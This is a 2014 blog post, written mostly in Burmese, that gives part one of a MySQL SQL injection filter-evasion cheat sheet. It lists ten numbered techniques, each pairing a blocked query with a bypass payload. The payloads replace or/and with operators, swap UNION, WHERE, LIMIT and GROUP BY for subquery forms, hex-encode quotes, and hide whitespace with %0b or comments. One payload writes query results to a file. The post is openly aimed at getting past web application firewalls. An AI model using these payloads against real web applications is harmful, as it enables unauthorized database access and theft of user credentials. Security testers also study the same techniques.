February 21, 2014

SQLi FIlter Eavision part 1



ဒါေလး မဆိုးဘူးထင္လို႔ မလာပါတယ္ အသံုး၀င္မယ္ထင္တာဘဲ
Bypass Technique ေတြေပါ့ ေတာ္ေတာ္စံုသဗ်
တတ္နိုင္သေလာက္ ျပန္ေရးထားတာပါဘဲ လိုအပ္တာေတြရွိရင္လည္း ၀င္ေရာက္ေဆြးေႏြးၾကဖို႕ဖိတ္ေခၚရင္း
စေဖာပါေတာ့မယ္
WAF bypassing Technique ေတြ အားႀကီးရွိတယ္မဟုတ္လား ဒီေတာ့ အပိုင္းေလးေတြနဲ႕
ေဖာထားတယ္ WAF ေက်ာ္တာေတြသိပ္နားမလည္းဘူးဆိုရင္ေတာ့ ဦးေဂါ့ ရဲ႕ HPP နဲ႕ ကစ္မရဲ႕
ေနာက္ကြယ္က အလုပ္လုပ္ပံုဆိုလား သြားဖတ္လုိက္မယ္ဆို (မဆိုးဘူး) တီးမိေခါက္မိ သြားမယ္
ေတာ္ေတာ္ေလးေကာင္းပါတယ္ ေရးထားၾကတာ link ေတာ့မေပးေတာ့ဘူး ကြကိုယ္ရွာေတာ့
Part 1 : Filter Evasion(Mysql)
[001].Block and , or
က်ေနာ္ တို႕သံုးခ်င္တဲ့ query က ေအာက္ကအတိုင္းဘဲဆိုပါေတာ့
1 or 1 = 1 (or) 1 and 1 = 1
WAF က ဘေလာ့ထားေလရဲ႕ ေအာက္ကလိုေက်ာ္လိုက္မယ္
1 || 1 = 1 (or) 1 && 1 = 1
သေဘာတရားခ်င္းကတူတူဘဲေလ || ကလည္း or ကို ေျပာတာဘဲ ဆိုတာ programmer ေတြေတာ့သိမွာပါ
&& ကလည္း and ဘဲ ျဖစ္တာကိုး
[002].Block UNION
Query: union select user,password from users
Bypass: (select user from users where user_id=1)= ’admin’
ဒီမွာဆိုရင္ေတာ့ က်ေနာ္ တို႕ကိုယ့္နည္းကိုယ့္ဟန္နဲ႕သိေအာင္လုပ္ဖို႕လိုတာေလးေတြရွိတယ္ေနာ္

[003].Block where
Query: (select user from users where user_id=1)= ‘admin’
Bypass: (select user from users limit 1)= ‘admin’
[004].Block limit
Query: (select user from users limit 1)= ‘admin’
Bypass : (select user from users group by user_id having user_id=1)= ‘admin’
[005].Block group by
Query: (select user from users group by user_id having user_id=1)= ‘admin’
Bypass: (select substr(group_concat(user_id),1,1) user from users)= ‘admin’
[006].Block SELECT
Query: (select substr(group_concat(user_id),1,1) user from users)= ‘admin’
Bypass: substr (user,1,1)= ‘a’
Bypass: 1 =1 into outfile ‘result.txt’
[007].Block ‘(single quote)
Query: substr (user,1,1)= ‘a’
Bypass : substr (user,1,1)= 0x61
Bypass: substr (user,1,1)=unhex(61)
[008].Block Hex
Query: substr (user,1,1)=unhex(61)
Bypass : substr (user,1,1)= lower (conv(11 ,10 ,36))

[009].Block substr
Query: substr(user,1,1)=lower (conv(11 ,10 ,36 ))
Bypass:  lpad(user,7,1)
[010].Block white space
Query :  lpad(user,7,1)
Bypass:%0blpad(user,7,1)
Bypass: /**/lpad(user,7,1)
ေလာေလာဆယ္ေတာ့ part 1 ဘဲေနာ္ ေနာက္မွဆက္ေရးမယ္ part 2ဆိုပီး
ေက်းဇူးတင္ပါတယ္ ခုလို စိတ္ညစ္ခံဖတ္ရွုေပးတဲ့အတြက္ …..
Credit : ZeQ3uL
4Rd4m-injecctor at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)